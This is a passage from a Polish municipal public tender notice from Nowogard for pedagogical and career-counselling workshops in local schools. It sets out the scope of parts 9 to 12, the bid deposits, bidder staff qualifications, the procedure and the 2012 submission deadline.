3.	Częstotliwość zajęć - według harmonogramu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły w uzgodnieniu z Dyrekcję Szkoły. 
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć, sporządzonych w uzgodnieniu z Dyrekcją Szkoły przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, wyłącznie przez osoby wykazane w ofercie (wykazie osób zał. 3).
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przekazanych przez Zamawiającego
7.	Łączna liczba godzin zajęć w ramach części 9 zamówienia - 240 godzin. 
8.	Termin zakończenia zajęć - 30.06.2015 r.
9.	Za wykonanie zadania Zamawiający zapłaci każdemu z wykonawców wynagrodzenie po całkowitym wykonaniu przez niego danego zadania

Część 11 zamówienia - pełnienie funkcji doradcy pedagogicznego w GM 2 
w Nowogardzie.
Warsztaty pedagogiczne skierowane są do uczniów mających zaniżoną samoocenę, kłopoty z komunikacją społeczna. Zajęcia mają być prowadzone metodami aktywizującymi, ekspresyjnymi i integracyjnymi.  W każdym gimnazjum 2 grupy po 8 osób.
1.	Przedmiotem zamówienia jest prowadzenie zajęć doradztwa pedagogicznego w grupach. W ramach części 11 przewidziane jest 240 godziny zajęć grupowych. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego.  Do przeprowadzenia zajęć zostaną użyte pomoce interaktywne. Uwaga - jedna godzina zajęć =60 min.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z pojazdu.
3.	Częstotliwość zajęć - według harmonogramu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły w uzgodnieniu z Dyrekcję Szkoły. 
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć, sporządzonych w uzgodnieniu z Dyrekcją Szkoły przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, wyłącznie przez osoby wykazane w ofercie (wykazie osób zał. 3).
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przekazanych przez Zamawiającego
7.	Łączna liczba godzin zajęć w ramach części 11 zamówienia - 240 godzin. 
8.	Termin zakończenia zajęć - 30.06.2015 r.
9.	Za wykonanie zadania Zamawiający zapłaci każdemu z wykonawców wynagrodzenie po całkowitym wykonaniu przez niego danego zadania

Część 12 zamówienia - pełnienie funkcji doradcy pedagogicznego w GM 3 
w Nowogardzie.
Warsztaty pedagogiczne skierowane są do uczniów mających zaniżoną samoocenę, kłopoty z komunikacją społeczna. Zajęcia mają być prowadzone metodami aktywizującymi, ekspresyjnymi i integracyjnymi.  W każdym gimnazjum 2 grupy po 8 osób.
1.	Przedmiotem zamówienia jest prowadzenie zajęć doradztwa pedagogicznego w grupach. W ramach części 12 przewidziane jest 240 godziny zajęć grupowych. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego.  Do przeprowadzenia zajęć zostaną użyte pomoce interaktywne. Uwaga - jedna godzina zajęć =60 min.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z pojazdu.
3.	Częstotliwość zajęć - według harmonogramu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły w uzgodnieniu z Dyrekcję Szkoły. 
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć, sporządzonych w uzgodnieniu z Dyrekcją Szkoły przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, wyłącznie przez osoby wykazane w ofercie (wykazie osób zał. 3).
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przekazanych przez Zamawiającego
7.	Łączna liczba godzin zajęć w ramach części 12 zamówienia - 240 godzin. 
8.	Termin zakończenia zajęć - 30.06.2015 r.
9.	Za wykonanie zadania Zamawiający zapłaci każdemu z wykonawców wynagrodzenie po całkowitym wykonaniu przez niego danego zadania
UWAGA: 
Zamawiający zastrzega, iż Wykonawcy składając ofertę uwzględnić muszą, iż jedną osobę może wskazać do wykonywania zadań w maksymalnie trzech częściach zamówienia. Wskazanie jednej osoby do wykonywania zadań wynikających z większej ilości części spowoduje odrzucenie oferty na podstawie art. 89 ust. 1 pkt. 2 PZP. 
Zamawiający zastrzega, iż Wykonawcy składając ofertę uwzględnić muszą, iż wszystkie osoby biorące udział w zamówieniu muszą posiadać doświadczenie zgodne z warunkami udziału w postępowaniu Rozdział I, punkt III, podpunkt 2.1 i posiadać kwalifikację zgodnie z obowiązującymi przepisami. Nie spełnienie tego warunku spowoduje odrzucenie oferty na podstawie art. 89 ust. 1 pkt. 2 PZP. 
Z uwagi na migracje uczniów Zamawiając zastrzega sobie prawo do zmiany ilości wszystkich przeprowadzonych godzin konsultacji indywidualnych na (+-)10 godzin..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających 
w oparciu o art. 67 ust. 1 pkt 6 ustawy PZP.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 85.31.23.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta powinna być zabezpieczona wadium w wysokości:
Łącznie na wszystkie zadania 1 650,00 PLN (słownie złotych: jeden tysiąc sześćset pięćdziesiąt 00/100).
Dla zadania 1: 250,00 PLN
Dla zadania 2: 200,00 PLN
Dla zadania 3: 50,00 PLN
Dla zadania 4: 100,00 PLN
Dla zadania 5: 100,00 PLN
Dla zadania 6: 100,00 PLN
Dla zadania 7: 50,00 PLN
Dla zadania 8: 100,00 PLN
Dla zadania 9: 250,00 PLN
Dla zadania 10: 150,00 PLN
Dla zadania 11: 150,00 PLN
Dla zadania 12: 150,00 PLN
Wadium może być  wniesione w :
pieniądzu,
poręczeniach bankowych lub SKOK, z tym, że poręczenie SKOK jest zawsze poręczeniem pieniężnym,
gwarancjach ubezpieczeniowych lub bankowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 , 2000 r. z późniejszymi zmianami). 
1.1	W przypadku wnoszenia wadium w pieniądzu, kwota oznaczona w punkcie 1 powinna zostać  przelana na konto Zamawiającego:

Bank PEKAO SA I Oddział Nowogard nr konta: 68 1240 3884 1111 0000 4209 2441
a Wykonawca  dołączy do oferty kserokopię polecenia przelewu. 

2. Wadium uznaje się za wniesione w momencie uznania rachunku Zamawiającego (realnego wpływu wadium na rachunek Zamawiającego przed terminem składania ofert).
      2.1  W przypadku wnoszenia wadium w innej formie niż pieniężna, należy je złożyć w kasie Zamawiającego, a kopię dokumentu umieścić w kopercie z ofertą.
Kasa mieści się w pokoju nr 1b w budynku gminy  przy Pl. Wolności 1, 72-200 Nowogard  i jest czynna od poniedziałku do piątku w godzinach  10.30 - 14.30.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykonawcy składający ofertę wykazali, że dysponują:
a)	Dla części 1 - minimum 1 osobą, która będzie pełnić na rzecz Zamawiającego usługi doradztwa zawodowego w GM 1 w Nowogardzie i spełnia jeden 
z następujących warunków: 
Wykształcenie wyższe na kierunku doradcy zawodowego lub społecznego i minimum 8 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 8 letni staż pracy.
Wykształcenie wyższe i kwalifikacje do pełnienia funkcji pedagoga zgodnie z  Rozporządzeniem Ministra Edukacji Narodowej w  sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli oraz  minimum 2 letni staż pracy w szkole na stanowisku pedagoga szkolnego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 2 letni stażu pracy na stanowisku pedagoga szkolnego.
Wykształcenie wyższe i posiadają licencję doradcy zawodowego wydaną na podstawie ustawy o promocji zatrudnienia i instytucji rynku pracy i minimum 3 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 3 letni stażu pracy.
b)	Dla części 2 - minimum 1 osobą, która będzie pełnić na rzecz Zamawiającego usługi doradztwa zawodowego w GM 2 w Nowogardzie i spełnia jeden 
z następujących warunków: 
Wykształcenie wyższe na kierunku doradcy zawodowego lub społecznego i minimum 8 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 8 letni staż pracy.
Wykształcenie wyższe i kwalifikacje do pełnienia funkcji pedagoga zgodnie z  Rozporządzeniem Ministra Edukacji Narodowej w  sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli oraz  minimum 2 letni staż pracy w szkole na stanowisku pedagoga szkolnego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 2 letni stażu pracy na stanowisku pedagoga szkolnego.
Wykształcenie wyższe i posiadają licencję doradcy zawodowego wydaną na podstawie ustawy o promocji zatrudnienia i instytucji rynku pracy i minimum 3 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 3 letni stażu pracy.
c)	Dla części 3 - minimum 1 osobą, która będzie pełnić na rzecz Zamawiającego usługi doradztwa zawodowego w GM 3 w Nowogardzie i spełnia jeden z następujących warunków: 
Wykształcenie wyższe na kierunku doradcy zawodowego lub społecznego i minimum 8 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 8 letni staż pracy.
Wykształcenie wyższe i kwalifikacje do pełnienia funkcji pedagoga zgodnie z  Rozporządzeniem Ministra Edukacji Narodowej w  sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli oraz  minimum 2 letni staż pracy w szkole na stanowisku pedagoga szkolnego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 2 letni stażu pracy na stanowisku pedagoga szkolnego.
Wykształcenie wyższe i posiadają licencję doradcy zawodowego wydaną na podstawie ustawy o promocji zatrudnienia i instytucji rynku pracy i minimum 3 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 3 letni stażu pracy.
d)	Dla części 4 - minimum 1 osobą, która będzie pełnić na rzecz Zamawiającego usługi doradztwa zawodowego w SP 1 w Nowogardzie i spełnia jeden z następujących warunków: 
Wykształcenie wyższe na kierunku doradcy zawodowego lub społecznego i minimum 8 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 8 letni staż pracy.
Wykształcenie wyższe i kwalifikacje do pełnienia funkcji pedagoga zgodnie z  Rozporządzeniem Ministra Edukacji Narodowej w  sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli oraz  minimum 2 letni staż pracy w szkole na stanowisku pedagoga szkolnego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 2 letni stażu pracy na stanowisku pedagoga szkolnego.
Wykształcenie wyższe i posiadają licencję doradcy zawodowego wydaną na podstawie ustawy o promocji zatrudnienia i instytucji rynku pracy i minimum 3 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 3 letni stażu pracy.
e)	Dla części 5 - minimum 1 osobą, która będzie pełnić na rzecz Zamawiającego usługi doradztwa zawodowego w SP 2 w Nowogardzie i spełnia jeden z następujących warunków: 
Wykształcenie wyższe na kierunku doradcy zawodowego lub społecznego i minimum 8 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 8 letni staż pracy.
Wykształcenie wyższe i kwalifikacje do pełnienia funkcji pedagoga zgodnie z  Rozporządzeniem Ministra Edukacji Narodowej w  sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli oraz  minimum 2 letni staż pracy w szkole na stanowisku pedagoga szkolnego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 2 letni stażu pracy na stanowisku pedagoga szkolnego.
Wykształcenie wyższe i posiadają licencję doradcy zawodowego wydaną na podstawie ustawy o promocji zatrudnienia i instytucji rynku pracy i minimum 3 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 3 letni stażu pracy.
f)	Dla części 6 - minimum 1 osobą, która będzie pełnić na rzecz Zamawiającego usługi doradztwa zawodowego w SP 3 w Nowogardzie i spełnia jeden z następujących warunków: 
Wykształcenie wyższe na kierunku doradcy zawodowego lub społecznego i minimum 8 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 8 letni staż pracy.
Wykształcenie wyższe i kwalifikacje do pełnienia funkcji pedagoga zgodnie z  Rozporządzeniem Ministra Edukacji Narodowej w  sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli oraz  minimum 2 letni staż pracy w szkole na stanowisku pedagoga szkolnego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 2 letni stażu pracy na stanowisku pedagoga szkolnego.
Wykształcenie wyższe i posiadają licencję doradcy zawodowego wydaną na podstawie ustawy o promocji zatrudnienia i instytucji rynku pracy i minimum 3 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 3 letni stażu pracy.
g)	Dla części 7 - minimum 1 osobą, która będzie pełnić na rzecz Zamawiającego usługi doradztwa zawodowego w SP 4 w Nowogardzie i spełnia jeden z następujących warunków: 
Wykształcenie wyższe na kierunku doradcy zawodowego lub społecznego i minimum 8 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 8 letni staż pracy.
Wykształcenie wyższe i kwalifikacje do pełnienia funkcji pedagoga zgodnie z  Rozporządzeniem Ministra Edukacji Narodowej w  sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli oraz  minimum 2 letni staż pracy w szkole na stanowisku pedagoga szkolnego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 2 letni stażu pracy na stanowisku pedagoga szkolnego.
Wykształcenie wyższe i posiadają licencję doradcy zawodowego wydaną na podstawie ustawy o promocji zatrudnienia i instytucji rynku pracy i minimum 3 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 3 letni stażu pracy.
h)	Dla części 8 - minimum 3 osobami, które będą pełnić na rzecz Zamawiającego usługi doradztwa zawodowego w SP (wiejskich tj.: w Błotnie, Wierzbięcinie, Żabowie, Długołęce, Orzechowie, Strzelewie) i spełniają jeden z następujących warunków: 
Wykształcenie wyższe na kierunku doradcy zawodowego lub społecznego i minimum 8 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 8 letni staż pracy.
Wykształcenie wyższe i kwalifikacje do pełnienia funkcji pedagoga zgodnie z  Rozporządzeniem Ministra Edukacji Narodowej w  sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli oraz  minimum 2 letni staż pracy w szkole na stanowisku pedagoga szkolnego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 2 letni stażu pracy na stanowisku pedagoga szkolnego.
Wykształcenie wyższe i posiadają licencję doradcy zawodowego wydaną na podstawie ustawy o promocji zatrudnienia i instytucji rynku pracy i minimum 3 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 3 letni stażu pracy.
i)	Dla części 9 - minimum 1 osobą, która będzie pełnić na rzecz Zamawiającego usługi w ramach warsztatów Twoja przyszłość w twoich rękach w dziesięciu SP (SP 1, SP 2, SP 3 SP 4 w Nowogardzie i Szkołach wiejskich w Błotnie, Wierzbięcinie, Żabowie, Długołęce, Orzechowie, Strzelewie) i trzech GM w Nowogardzie (GM 1, GM 2, GM 3 w Nowogardzie). Wykonawca musi spełniać następujący warunek: 
Wykształcenie wyższe na kierunku doradcy zawodowego lub społecznego i minimum 8 letni staż pracy. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 8 letni staż pracy.
j)	Dla części 10 - minimum 1 osobą, która będzie pełnić na rzecz Zamawiającego usługi doradztwa pedagogicznego  w GM 1 w Nowogardzie i spełniać  następujący warunek: 
Wykształcenie wyższe i kwalifikacje do pełnienia funkcji pedagoga zgodnie z  Rozporządzeniem Ministra Edukacji Narodowej w  sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli oraz  minimum 2 letni staż pracy w szkole na stanowisku pedagoga szkolnego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 2 letni stażu pracy na stanowisku pedagoga szkolnego.
k)	Dla części 11 - minimum 1 osobą, która będzie pełnić na rzecz Zamawiającego usługi doradztwa pedagogicznego w GM 2 w Nowogardzie i spełniać następujący warunek: 
Wykształcenie wyższe i kwalifikacje do pełnienia funkcji pedagoga zgodnie z  Rozporządzeniem Ministra Edukacji Narodowej w  sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli oraz  minimum 2 letni staż pracy w szkole na stanowisku pedagoga szkolnego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 2 letni stażu pracy na stanowisku pedagoga szkolnego.
l)	Dla części 12 - minimum 1 osobą, która będzie pełnić na rzecz Zamawiającego usługi doradztwa pedagogicznego w GM 3 w Nowogardzie i spełniać następujący warunek: 
Wykształcenie wyższe i kwalifikacje do pełnienia funkcji pedagoga zgodnie z  Rozporządzeniem Ministra Edukacji Narodowej w  sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli oraz  minimum 2 letni staż pracy w szkole na stanowisku pedagoga szkolnego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów, dokumenty potwierdzające posiadanie co najmniej 2 letni stażu pracy na stanowisku pedagoga szkolnego.
ocena warunku na zasadach spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - załącznik nr 1</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, iż zmiana istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy jest zakazana, za wyjątkiem sytuacji, gdy: -zmiana jest dla Zamawiającego korzystna; -zmiana wynika ze zmiany ustawowej stawki podatku VAT; -zmiana wynika ze zmian Zasad finansowania Programu Operacyjnego Kapitał Ludzki lub Wytycznych w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowogard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Edukacji, Zdrowia, Kultury i Sportu Urzędu Miejskiego w Nowogardzie, ul. 3 Maja 6, 72-200 Nowogard.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.11.2012 godzina 09:00, miejsce: Urząd Miejski w Nowogardzie, Biuro Obsługi Interesanta, Plac Wolności 1, 72-200 Nowogard.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




